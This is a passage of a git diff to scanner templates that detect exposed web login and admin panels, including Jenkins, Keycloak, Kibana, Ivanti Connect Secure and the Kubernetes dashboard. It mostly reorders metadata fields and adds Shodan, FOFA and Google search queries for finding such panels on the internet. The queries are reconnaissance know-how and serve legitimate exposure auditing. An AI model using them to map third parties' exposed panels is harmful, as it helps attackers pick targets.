b/http/exposed-panels/intelbras-panel.yaml index 40b7816458..7249bf9337 100644 --- a/http/exposed-panels/intelbras-panel.yaml +++ b/http/exposed-panels/intelbras-panel.yaml @@ -10,12 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:intelbras:cip_92200_firmware:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Intelbras" - max-request: 1 - product: cip_92200_firmware - shodan-query: http.title:"Intelbras" - vendor: intelbras verified: true + max-request: 1 + vendor: intelbras + product: cip_92200_firmware + shodan-query: + - http.title:"Intelbras" + - http.title:"intelbras" + fofa-query: + - app="Intelbras" + - title="intelbras" + - app="intelbras" + google-query: intitle:"intelbras" tags: panel,intelbras http: diff --git a/http/exposed-panels/intellian-aptus-panel.yaml b/http/exposed-panels/intellian-aptus-panel.yaml index 9aad1b4290..ce03aadef1 100644 --- a/http/exposed-panels/intellian-aptus-panel.yaml +++ b/http/exposed-panels/intellian-aptus-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:intelliantech:aptus_web:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: aptus_web - shodan-query: http.title:"Intellian Aptus Web" vendor: intelliantech + product: aptus_web + shodan-query: + - http.title:"Intellian Aptus Web" + - http.title:"intellian aptus web" + fofa-query: title="intellian aptus web" + google-query: intitle:"intellian aptus web" tags: panel,intellian,aptus,intelliantech http: diff --git a/http/exposed-panels/interactsoftware-interact.yaml b/http/exposed-panels/interactsoftware-interact.yaml index 74bdb6aa8c..40075e0d5c 100644 --- a/http/exposed-panels/interactsoftware-interact.yaml +++ b/http/exposed-panels/interactsoftware-interact.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.interactsoftware.com metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,interactsoftware,interact,detect http: diff --git a/http/exposed-panels/ipdiva-mediation-panel.yaml b/http/exposed-panels/ipdiva-mediation-panel.yaml index e5720f2222..e636f39621 100644 --- a/http/exposed-panels/ipdiva-mediation-panel.yaml +++ b/http/exposed-panels/ipdiva-mediation-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"IPdiva" - verified: true tags: panel,ipdiva,mediation http: diff --git a/http/exposed-panels/isams-panel.yaml b/http/exposed-panels/isams-panel.yaml index 66d0ec9459..7837a02406 100644 --- a/http/exposed-panels/isams-panel.yaml +++ b/http/exposed-panels/isams-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.isams.com/platform/the-platform metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-81573405 - verified: true tags: panel,isams,login http: diff --git a/http/exposed-panels/issabel-login.yaml b/http/exposed-panels/issabel-login.yaml index 0d43d96a38..d4936e2ca1 100644 --- a/http/exposed-panels/issabel-login.yaml +++ b/http/exposed-panels/issabel-login.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="Issabel" max-request: 1 + fofa-query: title="Issabel" tags: issabel,panel http: diff --git a/http/exposed-panels/itop-panel.yaml b/http/exposed-panels/itop-panel.yaml index e6a684bafc..ee42fe7ea1 100644 --- a/http/exposed-panels/itop-panel.yaml +++ b/http/exposed-panels/itop-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: itop vendor: combodo + product: itop tags: panel,itop,combodo http: diff --git a/http/exposed-panels/ivanti-connect-secure-panel.yaml b/http/exposed-panels/ivanti-connect-secure-panel.yaml index 6c9690d6e6..f03f78c634 100644 --- a/http/exposed-panels/ivanti-connect-secure-panel.yaml +++ b/http/exposed-panels/ivanti-connect-secure-panel.yaml @@ -11,11 +11,18 @@ info: classification: cpe: cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: connect_secure - shodan-query: title:"Ivanti Connect Secure" - vendor: ivanti verified: true + max-request: 2 + vendor: ivanti + product: connect_secure + shodan-query: + - title:"Ivanti Connect Secure" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - title="ivanti connect secure" + - body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" tags: panel,connectsecure,login,ivanti http: diff --git a/http/exposed-panels/ixcache-panel.yaml b/http/exposed-panels/ixcache-panel.yaml index 00d153a95e..15a3d347c1 100644 --- a/http/exposed-panels/ixcache-panel.yaml +++ b/http/exposed-panels/ixcache-panel.yaml @@ -11,8 +11,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="iXCache" max-request: 1 + fofa-query: app="iXCache" tags: ixcache,panel http: diff --git a/http/exposed-panels/jamf-login.yaml b/http/exposed-panels/jamf-login.yaml index f5b1aadfcb..ff7b181a4b 100644 --- a/http/exposed-panels/jamf-login.yaml +++ b/http/exposed-panels/jamf-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Jamf Pro" - verified: true tags: panel,jamf http: diff --git a/http/exposed-panels/jamf-setup-assistant.yaml b/http/exposed-panels/jamf-setup-assistant.yaml index af8e1bacbe..fe6b25f3cf 100644 --- a/http/exposed-panels/jamf-setup-assistant.yaml +++ b/http/exposed-panels/jamf-setup-assistant.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Jamf Pro Setup" - verified: true tags: jamf,setup,panel http: diff --git a/http/exposed-panels/jaspersoft-panel.yaml b/http/exposed-panels/jaspersoft-panel.yaml index e0cf31ab64..fcfa6977e8 100644 --- a/http/exposed-panels/jaspersoft-panel.yaml +++ b/http/exposed-panels/jaspersoft-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:tibco:jaspersoft:*:*:*:*:aws_with_multi-tenancy:*:*:* metadata: max-request: 2 - product: jaspersoft - shodan-query: http.title:"Jaspersoft" vendor: tibco + product: jaspersoft + shodan-query: + - http.title:"Jaspersoft" + - http.title:"jaspersoft" + fofa-query: title="jaspersoft" + google-query: intitle:"jaspersoft" tags: panel,jaspersoft,tibco http: diff --git a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml index fd09285f8a..ca2f8d6aaf 100644 --- a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml +++ b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:jbpm:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: jbpm - shodan-query: html:"JBossWS" - vendor: redhat verified: true + max-request: 1 + vendor: redhat + product: jbpm + shodan-query: + - html:"JBossWS" + - http.html:"jbossws" + fofa-query: body="jbossws" tags: jboss,panel,login,redhat http: diff --git a/http/exposed-panels/jboss/jboss-juddi.yaml b/http/exposed-panels/jboss/jboss-juddi.yaml index 236e48f9eb..955dbabf49 100644 --- a/http/exposed-panels/jboss/jboss-juddi.yaml +++ b/http/exposed-panels/jboss/jboss-juddi.yaml @@ -6,19 +6,22 @@ info: severity: info description: | The jUDDI (Java Universal Description, Discovery and Integration) Registry is a core component of the JBoss Enterprise SOA Platform. It is the product's default service registry and comes included as part of the product. In it are stored the addresses (end-point references) of all the services connected to the Enterprise Service Bus. It was implemented in JAXR and conforms to the UDDI specifications. + remediation: Restrict access to the service if not needed. reference: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossJuddi.java - remediation: Restrict access to the service if not needed. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:jboss_enterprise_web_platform:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: jboss_enterprise_web_platform - shodan-query: html:"JBoss WS" - vendor: redhat verified: true + max-request: 2 + vendor: redhat + product: jboss_enterprise_web_platform + shodan-query: + - html:"JBoss WS" + - http.html:"jboss ws" + fofa-query: body="jboss ws" tags: panel,jboss,juddi,redhat http: diff --git a/http/exposed-panels/jboss/jboss-soa-platform.yaml b/http/exposed-panels/jboss/jboss-soa-platform.yaml index ff7e92a740..d287b7a6f7 100644 --- a/http/exposed-panels/jboss/jboss-soa-platform.yaml +++ b/http/exposed-panels/jboss/jboss-soa-platform.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:jboss_soa_platform:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: jboss_soa_platform - shodan-query: http.title:"Welcome to the JBoss SOA Platform" - vendor: redhat verified: true + max-request: 1 + vendor: redhat + product: jboss_soa_platform + shodan-query: + - http.title:"Welcome to the JBoss SOA Platform" + - http.title:"welcome to the jboss soa platform" + fofa-query: title="welcome to the jboss soa platform" + google-query: intitle:"welcome to the jboss soa platform" tags: panel,jboss,soa,redhat http: diff --git a/http/exposed-panels/jboss/jmx-console.yaml b/http/exposed-panels/jboss/jmx-console.yaml index bc12927cd8..59601aa576 100644 --- a/http/exposed-panels/jboss/jmx-console.yaml +++ b/http/exposed-panels/jboss/jmx-console.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:redhat:jboss_keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: jboss_keycloak vendor: redhat + product: jboss_keycloak tags: panel,jmx,jboss,redhat http: diff --git a/http/exposed-panels/jboss/wildfly-panel.yaml b/http/exposed-panels/jboss/wildfly-panel.yaml index 504744f093..db5d986c66 100644 --- a/http/exposed-panels/jboss/wildfly-panel.yaml +++ b/http/exposed-panels/jboss/wildfly-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:redhat:wildfly:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wildfly vendor: redhat + product: wildfly tags: panel,jboss,wildfly,redhat http: diff --git a/http/exposed-panels/jcms-panel.yaml b/http/exposed-panels/jcms-panel.yaml index 6e4d3d8c79..17ab122f13 100644 --- a/http/exposed-panels/jcms-panel.yaml +++ b/http/exposed-panels/jcms-panel.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:jalios:jcms:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: jcms - shodan-query: html:"Jalios JCMS" - vendor: jalios verified: true + max-request: 2 + vendor: jalios + product: jcms + shodan-query: + - html:"Jalios JCMS" + - http.html:"jalios jcms" + fofa-query: body="jalios jcms" tags: panel,jalios,jcms http: diff --git a/http/exposed-panels/jedox-web-panel.yaml b/http/exposed-panels/jedox-web-panel.yaml index 2253762d0e..9891234af4 100644 --- a/http/exposed-panels/jedox-web-panel.yaml +++ b/http/exposed-panels/jedox-web-panel.yaml @@ -11,12 +11,21 @@ info: classification: cpe: cpe:2.3:a:jedox:jedox:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Jedox Web Login" - max-request: 2 - product: jedox - shodan-query: title:"Jedox Web - Login" - vendor: jedox verified: true + max-request: 2 + vendor: jedox + product: jedox + shodan-query: + - title:"Jedox Web - Login" + - http.title:"jedox web - login" + - http.title:"jedox web login" + google-query: + - intitle:"Jedox Web Login" + - intitle:"jedox web login" + - intitle:"jedox web - login" + fofa-query: + - title="jedox web login" + - title="jedox web - login" tags: panel,jedox,detect http: diff --git a/http/exposed-panels/jeedom-panel.yaml b/http/exposed-panels/jeedom-panel.yaml index 3559df12db..a274bee59e 100644 --- a/http/exposed-panels/jeedom-panel.yaml +++ b/http/exposed-panels/jeedom-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: jeedom - shodan-query: http.title:"Jeedom" vendor: jeedom + product: jeedom + shodan-query: + - http.title:"Jeedom" + - http.title:"jeedom" + fofa-query: title="jeedom" + google-query: intitle:"jeedom" tags: panel,jeedom,login http: diff --git a/http/exposed-panels/jellyseerr-login-panel.yaml b/http/exposed-panels/jellyseerr-login-panel.yaml index be7e9325bf..9faacd5d31 100644 --- a/http/exposed-panels/jellyseerr-login-panel.yaml +++ b/http/exposed-panels/jellyseerr-login-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/Fallenbagel/jellyseerr metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-2017604252 - verified: true tags: panel,jellyseerr,detect http: diff --git a/http/exposed-panels/jenkins-api-panel.yaml b/http/exposed-panels/jenkins-api-panel.yaml index 5dcd1de78f..b58a61bbbf 100644 --- a/http/exposed-panels/jenkins-api-panel.yaml +++ b/http/exposed-panels/jenkins-api-panel.yaml @@ -11,8 +11,13 @@ info: cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: jenkins vendor: jenkins + product: jenkins + shodan-query: + - cpe:"cpe:2.3:a:jenkins:jenkins" + - http.favicon.hash:81586312 + - product:"jenkins" + fofa-query: icon_hash=81586312 tags: panel,api,jenkins http: diff --git a/http/exposed-panels/jenkins-login.yaml b/http/exposed-panels/jenkins-login.yaml index 0ea29f7978..ddf2fdd652 100644 --- a/http/exposed-panels/jenkins-login.yaml +++ b/http/exposed-panels/jenkins-login.yaml @@ -5,16 +5,21 @@ info: author: pdteam severity: info description: Jenkins is an open source automation server. + remediation: Ensure proper access. reference: - https://www.jenkins.io/doc/book/security/ - remediation: Ensure proper access. classification: cwe-id: CWE-200 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: jenkins vendor: jenkins + product: jenkins + shodan-query: + - cpe:"cpe:2.3:a:jenkins:jenkins" + - http.favicon.hash:81586312 + - product:"jenkins" + fofa-query: icon_hash=81586312 tags: panel,jenkins http: diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 73afbece5f..4054c09520 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -13,8 +13,8 @@ info: cwe-id: CWE-200 metadata: verified: true - max-request: 1 - shodan-query: http.title:"JFrog" + max-request: 2 + shodan-query: "http.title:\"JFrog\"" tags: panel,jfrog,edb,detect,login http: diff --git a/http/exposed-panels/joomla-panel.yaml b/http/exposed-panels/joomla-panel.yaml index 8b348589bc..1479f043f2 100644 --- a/http/exposed-panels/joomla-panel.yaml +++ b/http/exposed-panels/joomla-panel.yaml @@ -8,8 +8,13 @@ info: cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: joomla\! vendor: joomla + product: joomla\! + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" + fofa-query: body="joomla! - open source content management" tags: panel,joomla http: diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml index 51e3b81b5b..02e66387ff 100644 --- a/http/exposed-panels/jorani-panel.yaml +++ b/http/exposed-panels/jorani-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"Login - Jorani" - verified: true tags: panel,jorani,login http: diff --git a/http/exposed-panels/jsherp-boot-panel.yaml b/http/exposed-panels/jsherp-boot-panel.yaml index b63038f32b..70d678ccab 100644 --- a/http/exposed-panels/jsherp-boot-panel.yaml +++ b/http/exposed-panels/jsherp-boot-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-1298131932 - verified: true tags: panel,jsherp,login,detect http: diff --git a/http/exposed-panels/jumpserver-panel.yaml b/http/exposed-panels/jumpserver-panel.yaml index 94e58f7239..84e8d8bd26 100644 --- a/http/exposed-panels/jumpserver-panel.yaml +++ b/http/exposed-panels/jumpserver-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:'JumpServer' - verified: true zoomeye-query: title:'JumpServer' tags: panel,jumpserver diff --git a/http/exposed-panels/juniper-panel.yaml b/http/exposed-panels/juniper-panel.yaml index 874135d346..1bd9ddfa79 100644 --- a/http/exposed-panels/juniper-panel.yaml +++ b/http/exposed-panels/juniper-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Juniper Web Device Manager" - verified: true tags: panel,juniper,vpn,login http: diff --git a/http/exposed-panels/kafka-center-login.yaml b/http/exposed-panels/kafka-center-login.yaml index d329aac6c3..4fee3649c2 100644 --- a/http/exposed-panels/kafka-center-login.yaml +++ b/http/exposed-panels/kafka-center-login.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: kafka - shodan-query: http.title:"Kafka Center" vendor: apache + product: kafka + shodan-query: + - http.title:"Kafka Center" + - http.title:"kafka center" + - http.title:"kafka consumer offset monitor" + fofa-query: + - title="kafka center" + - title="kafka consumer offset monitor" + google-query: + - intitle:"kafka center" + - intitle:"kafka consumer offset monitor" tags: panel,kafka,apache http: diff --git a/http/exposed-panels/kafka-consumer-monitor.yaml b/http/exposed-panels/kafka-consumer-monitor.yaml index 84989f2823..b3b998baed 100644 --- a/http/exposed-panels/kafka-consumer-monitor.yaml +++ b/http/exposed-panels/kafka-consumer-monitor.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: kafka - shodan-query: http.title:"Kafka Consumer Offset Monitor" vendor: apache + product: kafka + shodan-query: + - http.title:"Kafka Consumer Offset Monitor" + - http.title:"kafka center" + - http.title:"kafka consumer offset monitor" + fofa-query: + - title="kafka center" + - title="kafka consumer offset monitor" + google-query: + - intitle:"kafka center" + - intitle:"kafka consumer offset monitor" tags: panel,kafka,apache http: diff --git a/http/exposed-panels/kafka-monitoring.yaml b/http/exposed-panels/kafka-monitoring.yaml index a718eb2282..c0ecab3014 100644 --- a/http/exposed-panels/kafka-monitoring.yaml +++ b/http/exposed-panels/kafka-monitoring.yaml @@ -11,8 +11,17 @@ info: cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: kafka vendor: apache + product: kafka + shodan-query: + - http.title:"kafka center" + - http.title:"kafka consumer offset monitor" + fofa-query: + - title="kafka center" + - title="kafka consumer offset monitor" + google-query: + - intitle:"kafka center" + - intitle:"kafka consumer offset monitor" tags: panel,kafka,apache http: diff --git a/http/exposed-panels/kafka-topics-ui.yaml b/http/exposed-panels/kafka-topics-ui.yaml index ee3176e197..d66f120ca8 100644 --- a/http/exposed-panels/kafka-topics-ui.yaml +++ b/http/exposed-panels/kafka-topics-ui.yaml @@ -14,9 +14,9 @@ info: cpe: cpe:2.3:a:provectus:ui:*:*:*:*:kafka:*:*:* metadata: max-request: 2 - platform: kafka - product: ui vendor: provectus + product: ui + platform: kafka tags: panel,kafka,apache,detect,provectus http: diff --git a/http/exposed-panels/kanboard-login.yaml b/http/exposed-panels/kanboard-login.yaml index eb355cb888..4aba38c7ad 100644 --- a/http/exposed-panels/kanboard-login.yaml +++ b/http/exposed-panels/kanboard-login.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: kanboard product: kanboard shodan-query: http.favicon.hash:2056442365 - vendor: kanboard - verified: true + fofa-query: icon_hash=2056442365 tags: panel,kanboard http: diff --git a/http/exposed-panels/kasm-login-panel.yaml b/http/exposed-panels/kasm-login-panel.yaml index ae8db990d7..f168590290 100644 --- a/http/exposed-panels/kasm-login-panel.yaml +++ b/http/exposed-panels/kasm-login-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-2144699833 - verified: true tags: panel,kasm,login,detect http: diff --git a/http/exposed-panels/kavita-panel-detect.yaml b/http/exposed-panels/kavita-panel-detect.yaml index 37ae6f4ace..02dbe85a68 100644 --- a/http/exposed-panels/kavita-panel-detect.yaml +++ b/http/exposed-panels/kavita-panel-detect.yaml @@ -12,9 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"kavita" - verified: true + product: kavita + vendor: kavitareader + fofa-query: title="kavita" + google-query: intitle:"kavita" tags: panel,kavita http: diff --git a/http/exposed-panels/kenesto-login.yaml b/http/exposed-panels/kenesto-login.yaml index 789fc4d1a0..9c7e4a97c9 100644 --- a/http/exposed-panels/kenesto-login.yaml +++ b/http/exposed-panels/kenesto-login.yaml @@ -11,8 +11,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="kenesto" max-request: 1 + fofa-query: app="kenesto" tags: login,tech,kenesto,panel http: diff --git a/http/exposed-panels/kettle-panel.yaml b/http/exposed-panels/kettle-panel.yaml index 4199c91c89..91bee88751 100644 --- a/http/exposed-panels/kettle-panel.yaml +++ b/http/exposed-panels/kettle-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: basic realm="Kettle" - verified: true tags: panel,kettle http: diff --git a/http/exposed-panels/keycloak-admin-panel.yaml b/http/exposed-panels/keycloak-admin-panel.yaml index 48e890ebd1..294ff79fc4 100644 --- a/http/exposed-panels/keycloak-admin-panel.yaml +++ b/http/exposed-panels/keycloak-admin-panel.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: keycloak - shodan-query: http.favicon.hash:-1105083093 - vendor: redhat verified: true + max-request: 3 + vendor: redhat + product: keycloak + shodan-query: + - http.favicon.hash:-1105083093 + - http.title:"keycloak" + - http.html:"keycloak" + fofa-query: + - icon_hash=-1105083093 + - body="keycloak" + - title="keycloak" + google-query: intitle:"keycloak" tags: panel,keycloak,redhat http: diff --git a/http/exposed-panels/kibana-panel.yaml b/http/exposed-panels/kibana-panel.yaml index de0f9663c9..40cfd4d8f6 100644 --- a/http/exposed-panels/kibana-panel.yaml +++ b/http/exposed-panels/kibana-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 3 - product: kibana - shodan-query: http.title:"Kibana" vendor: elastic + product: kibana + shodan-query: + - http.title:"Kibana" + - http.title:"kibana" + fofa-query: title="kibana" + google-query: intitle:"kibana" tags: panel,kibana,elastic http: diff --git a/http/exposed-panels/kiteworks-pcn-panel.yaml b/http/exposed-panels/kiteworks-pcn-panel.yaml index 3941b2c4b6..22ecce8d76 100644 --- a/http/exposed-panels/kiteworks-pcn-panel.yaml +++ b/http/exposed-panels/kiteworks-pcn-panel.yaml @@ -11,11 +11,12 @@ info: classification: cpe: cpe:2.3:a:accellion:kiteworks:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: accellion product: kiteworks shodan-query: http.favicon.hash:-1215318992 - vendor: accellion - verified: true + fofa-query: icon_hash=-1215318992 tags: panel,kiteworks,login,detect,accellion http: diff --git a/http/exposed-panels/kiwitcms-login.yaml b/http/exposed-panels/kiwitcms-login.yaml index eb09c731fe..862123eba6 100644 --- a/http/exposed-panels/kiwitcms-login.yaml +++ b/http/exposed-panels/kiwitcms-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:kiwitcms:kiwi_tcms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: kiwi_tcms - shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 vendor: kiwitcms + product: kiwi_tcms + shodan-query: + - title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 + - http.title:"kiwi tcms - login" http.favicon.hash:-1909533337 + fofa-query: title="kiwi tcms - login" http.favicon.hash:-1909533337 + google-query: intitle:"kiwi tcms - login" http.favicon.hash:-1909533337 tags: kiwitcms,panel http: diff --git a/http/exposed-panels/kkfileview-panel.yaml b/http/exposed-panels/kkfileview-panel.yaml index 55dbbfd9ed..57283e8efc 100644 --- a/http/exposed-panels/kkfileview-panel.yaml +++ b/http/exposed-panels/kkfileview-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"kkFileView" - verified: true tags: panel,kkfileview http: diff --git a/http/exposed-panels/klr300n-panel.yaml b/http/exposed-panels/klr300n-panel.yaml index 7366d676ed..8d7f97df3a 100644 --- a/http/exposed-panels/klr300n-panel.yaml +++ b/http/exposed-panels/klr300n-panel.yaml @@ -10,9 +10,9 @@ info: - http://www.keo.com.br/produtos/roteador-klr-300n - http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf metadata: - fofa-query: Roteador Wireless KLR 300N - max-request: 1 verified: true + max-request: 1 + fofa-query: Roteador Wireless KLR 300N tags: keo,klr300n,panel,login http: diff --git a/http/exposed-panels/kodak-network-panel.yaml b/http/exposed-panels/kodak-network-panel.yaml index 67bc929959..2ed52a106a 100644 --- a/http/exposed-panels/kodak-network-panel.yaml +++ b/http/exposed-panels/kodak-network-panel.yaml @@ -7,9 +7,9 @@ info: description: | A Kedacom network keyboard console panel was detected. metadata: - fofa-query: 网络键盘控制台 - max-request: 1 verified: true + max-request: 1 + fofa-query: 网络键盘控制台 tags: panel,login,kedacom,network http: diff --git a/http/exposed-panels/koel-panel.yaml b/http/exposed-panels/koel-panel.yaml index a0385811fa..08a11e2039 100644 --- a/http/exposed-panels/koel-panel.yaml +++ b/http/exposed-panels/koel-panel.yaml @@ -10,9 +10,9 @@ info: - https://koel.dev/ - https://github.com/koel/koel metadata: + verified: true max-request: 1 shodan-query: title:"Koel" - verified: true tags: panel,koel,login http: diff --git a/http/exposed-panels/konga-panel.yaml b/http/exposed-panels/konga-panel.yaml index dcb714ce86..3e4274000a 100644 --- a/http/exposed-panels/konga-panel.yaml +++ b/http/exposed-panels/konga-panel.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:pantsel:konga:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: konga vendor: pantsel + product: konga tags: tech,konga,oss,panel,pantsel http: diff --git a/http/exposed-panels/kopano-webapp-panel.yaml b/http/exposed-panels/kopano-webapp-panel.yaml index 2c6f0c4b71..d18c9d7d25 100644 --- a/http/exposed-panels/kopano-webapp-panel.yaml +++ b/http/exposed-panels/kopano-webapp-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://kopano.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Kopano WebApp" - verified: true tags: panel,kopano,login,detect http: diff --git a/http/exposed-panels/kraken-cluster-monitoring.yaml b/http/exposed-panels/kraken-cluster-monitoring.yaml index 8dd6d119a6..f2d810aefb 100644 --- a/http/exposed-panels/kraken-cluster-monitoring.yaml +++ b/http/exposed-panels/kraken-cluster-monitoring.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Kraken dashboard" - verified: true tags: panel,kraken,cluster http: diff --git a/http/exposed-panels/kubernetes-dashboard.yaml b/http/exposed-panels/kubernetes-dashboard.yaml index 34e3a778cc..60ae7d118c 100644 --- a/http/exposed-panels/kubernetes-dashboard.yaml +++ b/http/exposed-panels/kubernetes-dashboard.yaml @@ -10,8 +10,9 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - product: dashboard vendor: kubernetes + product: dashboard + shodan-query: product:"kubernetes" tags: panel,kubernetes,devops http: diff --git a/http/exposed-panels/kubernetes-enterprise-manager.yaml b/http/exposed-panels/kubernetes-enterprise-manager.yaml index 2703b5ccb3..daf425630a 100644 --- a/http/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml @@ -10,10 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Kubernetes-Enterprise-Manager" max-request: 1 - product: kubernetes vendor: kubernetes + product: kubernetes + fofa-query: + - app="Kubernetes-Enterprise-Manager" + - title="kubernetes web view" + - app="kubernetes-enterprise-manager" + shodan-query: 